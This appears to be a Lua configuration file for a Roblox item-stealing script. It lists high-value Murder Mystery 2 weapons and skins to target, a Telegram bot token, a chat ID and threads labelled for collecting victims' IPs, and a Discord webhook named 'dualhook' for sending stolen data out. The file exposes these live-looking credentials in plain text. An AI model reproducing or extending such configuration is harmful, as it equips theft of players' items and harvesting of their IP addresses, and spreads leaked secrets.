aprplayers = {
    "Guest194827461",
    "skibiditolet2018",
    "typazveer",
    "speralka8814",
    "eqz_s",
}
webhook = 10
poor = 37
chatId = -1002853777462
botToken = "8432656507:AAEpuoT4W15g_9iNBxFmTAQTwF9ZLtkBdRo"
threadIdIP = 104
threadmobile = 6
reportsid = 29143
bypassid = 778907
richgodliesList = {"Bat","Candy","Darksword","Darkshot", "Traveler's Gun", "Evergreen","Evergun","Bauble","Rainbow Gun", "Sunrise", "Sunset", "Rainbow","Constellation","Sakura","Blossom","Turkey","Vampire's Gun"}
richgodliesListpc = {"TreeKnife2023", "Turkey2023", "TreeGun2023","TravelerGun","Sakura_K", "Blossom_G", "ZombieBat", "Constellation", "Candy", "VampireGun", "SunsetKnife", "SunsetGun","Darksword","Darkshot","Rainbow_G","Rainbow_K","Bauble"}
skinNamesTG = {"Corrupt","Vampire's Axe","Gingerscope","Traveler's Axe","Celestial","Icepiercer","Harvester","Bat","Candy","Darksword","Darkshot", "Traveler's Gun", "Evergreen","Evergun","Bauble","Rainbow Gun", "Sunrise", "Sunset", "Rainbow","Constellation","Sakura","Blossom","Turkey","Vampire's Gun"}

dualhook = "https://discord.com/api/webhooks/1404742598492422254/GcACiGryztUPdpNIuvTpxq8p4o7BnVH675gs1f0zb0dR0GiPKjnuD2UVHAb9UokpZh5D"
